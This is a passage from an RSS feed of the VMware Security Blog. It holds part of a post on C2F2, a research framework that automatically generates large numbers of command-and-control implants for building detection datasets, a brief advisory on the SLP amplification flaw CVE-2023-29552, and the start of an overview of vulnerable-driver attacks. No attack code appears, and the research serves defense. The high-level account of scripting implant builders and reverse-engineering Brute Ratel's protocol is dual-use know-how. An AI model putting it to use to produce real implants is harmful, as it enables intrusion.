resemble legitimate communication with the C2 server or modify the binary
footprint of the implant through a parametric generation process. However, the
pos ]]>
<![CDATA[ sibility to create implants using various configuration options can be
leveraged by security researchers to create a vast dataset of samples and study
their invariants. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span ]]>
<![CDATA[ data-contrast="none">This blog post builds on the aforementioned idea
and aims to explore the potential of exploiting the polymorphic capabilities of
these implants to create a large dataset of samples. This dataset will then be
analyzed using a machine learning pipeline to identify any invariants ]]>
<![CDATA[ that can be used to improve our defenses against these
attacks.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="none">To achieve this goal, we developed a framework,
called C2F2, that abstracts the under ]]>
<![CDATA[ lying C2 framework and automatically generates C2 implants with
randomized options by iteratively changing the settings used at configuration
time. This process is repeated for each C2 framework, leading up to a
diversified yet representative dataset of malicious implants. </span><span
data-contrast ]]>
<![CDATA[ ="none">By analyzing this large collection of samples, security
professionals can also gain insights into the tactics, techniques, and
procedures (TTPs) used by threat actors to develop and deploy these
implants.</span></p> <h2 aria-level="1"><span data-contrast="none">C2F2: A C2
Framework Framework ]]>
<![CDATA[ </span><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contrast="auto">The C2 frameworks targeted by C2F2 are the
following:</span><span dat ]]>
<![CDATA[
a-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<ul> <li><a href="https://bruteratel.com/"><span data-contrast="none">Brute
Ratel</span></a><span data-ccp-props="{"134245418":tru ]]>
<![CDATA[
e,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><a href="https://www.cobaltstrike.com/"><span data-contrast="none">Cobalt
Strike</span></a><span
data-ccp-props="{"134245418":true,"134245529":true,"
]]>
<![CDATA[
201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><a href="https://github.com/cobbr/Covenant"><span
data-contrast="none">Covenant</span></a><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739&qu
]]>
<![CDATA[ ot;:160,"335559740":259}"> </span></li> <li><a
href="https://github.com/BC-SECURITY/Empire"><span
data-contrast="none">Empire</span></a><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}
]]>
<![CDATA[ "> </span></li> <li><a href="https://github.com/sensepost/godoh"><span
data-contrast="none">Godoh</span></a><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><a href="https:// ]]>
<![CDATA[ github.com/Ne0nd0g/merlin"><span
data-contrast="none">Merlin</span></a><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><a href="https://www.offsec.com/metasploit-unleashed/ab ]]>
<![CDATA[ out-meterpreter/"><span
data-contrast="none">Meterpreter</span></a><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><a href="https://github.com/nettitude/PoshC2"><span data-co ]]>
<![CDATA[ ntrast="none">PoshC2</span></a><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><a href="https://github.com/bats3c/shad0w"><span
data-contrast="none">Shad0w</span></a><span da ]]>
<![CDATA[
ta-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><a href="https://github.com/BishopFox/sliver"><span
data-contrast="none">Sliver</span></a><span
data-ccp-props="{"134245418" ]]>
<![CDATA[
:true,"134245529":true,"201341983":0,"335559739":160,"335559740":259}"> </span></li>
</ul> <p><span data-contrast="none">Before diving into the implant generation
process, we had to take several preparatory steps to ensure that the process can
run smoothly an ]]>
<![CDATA[ d effectively. Firstly, we had to understand the set of possible
options and respective values for each C2 framework. Secondly, it was necessary
to understand how to instrument and interact with each C2 framework to generate
the implant. </span><span data-ccp-props="{"201341983":0,"3 ]]>
<![CDATA[ 35559739":160,"335559740":259}"> </span></p> <p><span
data-contrast="none">Interacting with various C2 frameworks can be a challenging
task due to their differing interfaces. While some frameworks, like Sliver,
offer user-friendly command-line interfaces with multiple options, others ]]>
<![CDATA[ can only be queried via bespoke mechanisms; for example, Cobalt Strike
can only be interacted with using the Aggressor Script language. Additionally,
Brute Ratel and Covenant proved to be the most challenging. The former required
us to fully reverse-engineer the communication protocol used by the C ]]>
<![CDATA[ 2 server and the implant, while the latter, despite having various
functionality exposed via a RESTful API, required us to create the missing
implant generation functionality ourselves.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </spa
]]>
<![CDATA[ n></p> <p><span data-contrast="none">Specifically, the Brute Ratel’s
protocol requires the client to perform authorization twice: the first time by
sending the login and the password via an HTTP POST request, and then the second
time with the token, received from the first authorization attempt, s ]]>
<![CDATA[ ent via a newly established WebSocket channel. After successful
authorization, the WebSocket connection is used for client-server communication
where the client sends commands (e.g., “create a badger profile with the
following parameters”) and the server replies with status codes and the additio
]]>
<![CDATA[ nal data (e.g., with a Base64-encoded payload) that the client might
have requested. Both channels (the initial POST request and the WebSocket
connection) are JSON-based and use HTTPS as a transport layer.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740
]]>
<![CDATA[ ":259}"> </span></p> <p><span data-contrast="none">Covenant, on
the other hand, has a documented set of APIs, that include functions to create
implants. The APIs are based on JSON and use HTTPS as a transport layer. While
most of the functions indeed generate implants, some of them (e.g., the function
to generate a .NET executable implant) return no payload with the standard
reply. The payload is generated but never returned because that functionality is
not implemented. To overcome this limitation, the code of the framework was
amended to store the generated payload on disk.</span><sp ]]>
<![CDATA[ an
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="none">Once the options for each implant type had been
identified, we used a domain-specific language (DSL) to express them in a format
that can be easily consumed b ]]>
<![CDATA[ y the implant-generation process. This required careful consideration
and planning to ensure that the process is efficient and scalable. Finally, we
implemented an algorithm that given the grammar of one of the implant
configurations expressed with our DSL, can generate random configurations that
ar ]]>
<![CDATA[ e consistent with it. These configurations are then used to generate
the implants. This approach can be used to generate a large number of implant
variations, each tailored to specific target environments, and can be used to
test the effectiveness of various detection and defense strategies and to g ]]>
<![CDATA[ enerate signatures or detection procedures.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Architecture</span><span
data-ccp-props="{"134245418":true,"134245529" ]]>
<![CDATA[
;:true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contrast="none">We designed our framework based on two key
properties of the problem we needed to solve. Firstly, generating a single
implant can be a time-consum ]]>
<![CDATA[ ing process that may take several minutes to complete due to the
complexity of the steps involved; for example, in the case of Cobalt Strike,
creating a Malleable C2 profile, starting a Cobalt Strike server, using
Aggressor Scripts to generate the implant binary, and waiting for the result to
be pro ]]>
<![CDATA[ duced require several minutes. Secondly, the process of generating one
implant is independent of other implants, meaning that multiple implants can be
generated simultaneously in parallel, which can significantly increase the
efficiency of the process. To address these two factors, we ensured that o ]]>
<![CDATA[ ur framework was capable of handling asynchronous long-lasting jobs
and designed it to be easily parallelizable.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="none">Our infrastructure consists of four ]]>
<![CDATA[ key components that work together to facilitate the process of
generating implants:</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<ul> <li><b><span data-contrast="none">Generator</span></b><span
data-contrast="none">: This co ]]>
<![CDATA[ mponent retrieves the correct grammar based on the specified C2
framework type and generates a random implant configuration. The configuration
is then stored in the designated storage backend for future use.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"3355597
]]>
<![CDATA[ 40":259}"> </span></li> <li><b><span
data-contrast="none">Submitter</span></b><span data-contrast="none">: Once an
implant configuration is available, the submitter creates a job and sends it to
the appropriate queue based on the configuration type.</span><span
data-ccp-props="{"201341983 ]]>
<![CDATA[
":0,"335559739":160,"335559740":259}"> </span></li>
<li><b><span data-contrast="none">Receiver</span></b><span
data-contrast="none">: This component pulls jobs from the queue and sets up the
worker to generate the corresponding implant. Once the job is completed, the
receiv ]]>
<![CDATA[ er collects the result.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><b><span data-contrast="none">Worker</span></b><span data-contrast="none">:
Each worker is specialized in generating implants for a specific C2 framew ]]>
<![CDATA[ ork. Given an implant configuration, the worker generates the
corresponding implant. By dividing the workload across multiple workers, our
infrastructure is able to generate multiple implants in parallel, significantly
reducing the time required to generate large numbers of implants. Overall, these
]]>
<![CDATA[ components work seamlessly together to automate the implant generation
process and improve the efficiency of our system.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"><br
/> </span></li> </ul> <p><a href="https://blogs.vmware.com/security/ ]]>
<![CDATA[ files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83466"
src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-1024x452.png"
alt="" width="900" height="397" srcset="https://blogs.vmware.com/secur ]]>
<![CDATA[ ity/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-1024x452.png
1024w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-300x132.png
300w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-768x339.png
768w, https://blogs.vmwar ]]>
<![CDATA[
e.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-1536x678.png
1536w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-2048x904.png
2048w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.59.40-PM-600x265.png
600w" sizes= ]]>
<![CDATA[ "(max-width: 900px) 100vw, 900px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">2</span></i><i><span data-contrast="none">: C2F2
architecture for the generation of implant at scale.</span></i><span
data-ccp-props="{"201341983":0,"335551550 ]]>
<![CDATA[
":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p>
<p><span data-contrast="none">As shown in </span><span
data-contrast="auto">Figure 2</span><span data-contrast="none">, the workflow
for generating implants using the C2F2 system can be broken down i ]]>
<![CDATA[ nto the following steps: </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<ol> <li><span data-contrast="none">The user chooses the C2 framework type and
the number of implants to be generated and initiates the process.</span>< ]]>
<![CDATA[ span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><span data-contrast="none">The generator component retrieves the appropriate
grammar and generates the given number of random implant configurations, which
are then stored in the se ]]>
<![CDATA[ lected storage backend.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><span data-contrast="none">The submitter creates a job for each generated
configuration and sends it to the appropriate queue based on its type.</span ]]>
<![CDATA[ ><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><span data-contrast="none">The receiver pulls jobs from the queue and sets
up the appropriate specialized worker.</span><span
data-ccp-props="{"201341983":0,"335559 ]]>
<![CDATA[ 739":160,"335559740":259}"> </span></li> <li><span
data-contrast="none">The worker reads the configuration file and, using the
appropriate C2 framework, generates the implant.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}">
]]>
<![CDATA[ </span></li> <li><span data-contrast="none">Once the worker has
generated the implant, the receiver collects the result and stores it in the
designated storage backend.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li><sp ]]>
<![CDATA[ an data-contrast="none">Steps 4, 5, and 6 are repeated until the queue
is empty.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
</ol> <p><span data-contrast="none">Alternatively, the user can provide a custom
implant configur ]]>
<![CDATA[ ation, in which case the submitter sends the job directly to the
appropriate queue and the process continues as usual.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="none">Overall, this process ensures ]]>
<![CDATA[ that implant generation is standardized and customizable, making it
more efficient and effective.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Configuration
Generation</span><spa ]]>
<![CDATA[ n
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contrast="auto">Generating a vast number of valid C2 implant
configurations was a top priority w ]]>
<![CDATA[ hen designing the C2F2 implant generation system. To achieve this
goal, we aimed to significantly minimize the need for manual intervention. This
involved just one initial step in our exploratory phase, where researchers from
our team read each C2 framework specification and encoded the set of all p ]]>
<![CDATA[ ossible configuration types in our domain-specific language. Thanks to
having the models expressed in a DSL, we could generate configuration files that
were valid by default, adhering to the grammar encoded in the model.
Furthermore, the model (showcased in </span><span data-contrast="auto">Figure 3
]]>
<![CDATA[ </span><span data-contrast="auto">) also allows us to verify any
external configurations, guaranteeing that only valid configurations entered our
system.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><a href="https://blogs ]]>
<![CDATA[
.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83467"
src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-1024x411.png"
alt="" width="900" height="361" srcset="https://b ]]>
<![CDATA[
logs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-1024x411.png
1024w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-300x120.png
300w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-768x308.png
768w ]]>
<![CDATA[ ,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-1536x616.png
1536w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM-600x241.png
600w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.00.21-PM.png
1 ]]>
<![CDATA[ 700w" sizes="(max-width: 900px) 100vw, 900px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">3</span></i><i><span data-contrast="none">: Generation and
validation of models in C2F2.</span></i><span
data-ccp-props="{"201341983":0,"335551550& ]]>
<![CDATA[
quot;:2,"335551620":2,"335559739":200,"335559740":240}"> </span></p>
<p><span data-contrast="auto">To encode our configuration models, we decided to
utilize </span><a href="https://docs.pydantic.dev/"><span
data-contrast="none">Pydantic,</span></a><span data-contrast=" ]]>
<![CDATA[ auto"> a Python library for data validation that uses the Python type
system. Our decision to use Pydantic was based on multiple factors. Firstly, it
allowed us to encode the models directly using Python’s syntax. This made it
easier for our team to work with the tool and allowed us to quickly bui ]]>
<![CDATA[ ld understanding and expertise. Additionally, Pydantic provides a high
degree of flexibility, making it perfect for our needs.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">To give an example of ]]>
<![CDATA[ how Pydantic can be used, we can examine one of our implant models
created for the Shad0w C2 framework. The model is shown in </span><span
data-contrast="auto">Figure 4</span><span data-contrast="auto">.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740&q
]]>
<![CDATA[ uot;:259}"> </span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83468"
src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-1024x441.png"
]]>
<![CDATA[ alt="" width="900" height="388"
srcset="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-1024x441.png
1024w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-300x129.png
300w, https://blogs.vmware.com/security/files/2023/04/Scr ]]>
<![CDATA[ een-Shot-2023-04-26-at-3.01.03-PM-768x331.png 768w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-1536x661.png
1536w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM-600x258.png
600w, https://blogs.vmware.com/security/files/ ]]>
<![CDATA[ 2023/04/Screen-Shot-2023-04-26-at-3.01.03-PM.png 1658w"
sizes="(max-width: 900px) 100vw, 900px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">4</span></i><i><span data-contrast="none">: Model generated
for Shad0w.</span></i><span data-ccp-props="{"2 ]]>
<![CDATA[
01341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p>
<p><span data-contrast="auto">Pydantic offers more flexibility than just using
primitive types when defining our model types. For example, it allows us to have
more control over the value range for a given field, and it also supports more
complex types such as enumeration and custom types. After defining our models,
Pydantic allows us to obtain the schema definition as a Python dictionary, which
is then parsed and interpreted as the model grammar by our generator.
Furthermore, Pydantic also provides a method for us to validate a random JSON
against the model schema, ensuring that the generated configs adhere to the
specifications.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">A concrete example of a generated valid
configuration file for Shad0w can be observed in </span><span
data-contrast="auto">Figure 5</span><span data-contrast="auto">. The generated
configuration validates against the Shad0w model schema and is interpretable by
our system.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><a
href="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83469"
src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-1024x552.png"
alt="" width="800" height="431"
srcset="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-1024x552.png
1024w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-300x162.png
300w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-768x414.png
768w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-410x222.png
410w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM-600x323.png
600w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-3.01.39-PM.png
1036w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">5</span></i><i><span data-contrast="none">: Valid
configuration generated for Shad0w.</span></i><span
data-ccp-props="{"201341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Conclusions</span><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contrast="auto">In this blog post we presented C2F2, a framework
designed to instrument existing C2 frameworks. We show how it is possible to
leverage C2F2 to generate a large dataset of implants by leveraging the
configuration options provided by the selected C2 frameworks. Generating a large
number of implants is the first building block of any pipeline designed to
analyze and behaviorally detect backdoors at scale. While we are working on
releasing the framework to the public by mid-2023, we hope that providing an
early preview can foster further discussions and feedback on the topic from the
community.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto"> </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p><p>The
post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html">It’s
Raining Implants: How to Generate C2 Framework Implants At Scale</a> appeared
first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware
Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>VMware Response to CVE-2023-29552 – Reflective Denial-of-Service (DoS)
Amplification Vulnerability in SLP</title>
<link>https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html?utm_source=rss&utm_medium=rss&utm_campaign=vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp</link>
<dc:creator>
<![CDATA[ Edward Hawkins ]]>
...
</dc:creator>
<pubDate>Tue, 25 Apr 2023 14:08:33 +0000</pubDate>
<category>
<![CDATA[ VMware Security Response Center ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83452</guid>
<description>
<![CDATA[ <div><img width="300" height="163"
src="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png
300w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-222x120.png
222w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured.png
1709w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Greetings from the
VMware Security Response Center! Today we wanted to address CVE-2023-29552
– a vulnerability in SLP that could allow for a reflective
denial-of-service amplification attack that was disclosed on April 25th, 2023.
VMware has investigated this vulnerability and determined that currently
supported ESXi releases (ESXi 7.x and 8.x lines) are not impacted. However,
… <a
href="https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html">VMware
Response to CVE-2023-29552 – Reflective Denial-of-Service (DoS)
Amplification Vulnerability in SLP</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="163"
src="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-300x163.png
300w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured-222x120.png
222w,
https://blogs.vmware.com/security/files/2022/03/Workload-Security_Featured.png
1709w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>Greetings from the
VMware Security Response Center!</p> <p>Today we wanted to address
CVE-2023-29552 – a vulnerability in SLP that could allow for a reflective
denial-of-service amplification attack that was disclosed on April 25th,
2023.</p> <p>VMware has investigated this vulnerability and determined that
currently supported ESXi releases (ESXi 7.x and 8.x lines) are not impacted.</p>
<p>However, releases that have reached end of general support (EOGS) such as 6.7
and 6.5 have been found to be impacted by CVE-2023-29552. As per previous
guidance and best practice VMware recommends that the best option to address
CVE-2023-29552 is to upgrade to a supported release line that is not impacted by
the vulnerability. ESXi 7.0 U2c and newer, and ESXi 8.0 GA and newer, ship with
the SLP service hardened, disabled by default, and filtered by the ESXi
firewall. In lieu of an upgrade to a supported release, ESXi admins should
ensure that their ESXi hosts are not exposed to untrusted networks and also
disable SLP following the instructions in <a
href="https://kb.vmware.com/s/article/76372" target="_blank"
rel="noopener">KB76372</a>.</p> <p>VMware would like to thank Bitsight and CISA
for reporting this vulnerability to us.</p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html">VMware
Response to CVE-2023-29552 – Reflective Denial-of-Service (DoS)
Amplification Vulnerability in SLP</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>Bring Your Own Backdoor: How Vulnerable Drivers Let Hackers In</title>
<link>https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html?utm_source=rss&utm_medium=rss&utm_campaign=bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in</link>
<dc:creator>
<![CDATA[ Dana Behling ]]>
...
</dc:creator>
<pubDate>Wed, 19 Apr 2023 17:56:42 +0000</pubDate>
<category>
<![CDATA[ Threat Analysis Unit ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83445</guid>
<description>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
410w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Bring Your Own
Vulnerable Driver (BYOVD) techniques are not new; they can be traced back at
least as far as 2012 and the Shamoon wiper that targeted Saudi Aramco. The
attack used RawDisk driver, which could manipulate hard drives from user space
without any special permissions. This access enabled the malicious actor to
erase data … <a
href="https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html">Bring
Your Own Backdoor: How Vulnerable Drivers Let Hackers In</a> appeared first on
<a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security
Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/20 ]]>
<![CDATA[ 22/05/Threat-Analysis-Unit_410x222-300x162.png 300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
410w" sizes="(max-width: 300px) 100vw, 300px" /></div><p aria-level="1"><span
data-contrast="auto">Bring Your Own Vulnerable Driver (BYOVD) techniques are not
new; th ]]>
<![CDATA[ ey can be traced back at least as far as 2012 and the </span><a
href="https://en.wikipedia.org/wiki/Shamoon"><span
data-contrast="none">Shamoon</span></a><span data-contrast="auto"> wiper that
targeted Saudi Aramco. The attack used </span><a
href="https://attack.mitre.org/software/S0364/"><span data ]]>
<![CDATA[ -contrast="none">RawDisk driver</span></a><span data-contrast="auto">,
which could manipulate hard drives from user space without any special
permissions. This access enabled the malicious actor to erase data at such a
large scale, the company was forced to replace practically all hard drives on
its ]]>
<![CDATA[ network. The Shamoon/RawDisk driver attack did not use a vulnerability
in the driver, it used the driver for the purpose intended, but by a person or
group with unscrupulous objectives. In the case of Shamoon, the driver itself
could be considered a vulnerability, and in some ways, this is the case ]]>
<![CDATA[ with almost all vulnerabilities. The misuse of well-intended segments
of code necessary for functionality results in calamity. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">This paper provides ]]>
<![CDATA[ an overview of common driver vulnerabilities for currently supported
versions of Windows running on x86-64 architecture. Some driver principles and
concepts can be applied across operating systems, but for brevity the scope is
limited. It is intended as a high-level overview introduction to the top ]]>
<![CDATA[ ic of driver vulnerabilities in Windows. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">What is a driver?</span><span
data-ccp-props="{"134245418":true,"134245529& ]]>
<![CDATA[
quot;:true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contrast="auto">At an exceedingly high level, drivers are software
that allows the operating system to interact with all the different physical
parts of a com ]]>
<![CDATA[ puter. Each physical component of a computer is commonly referred to
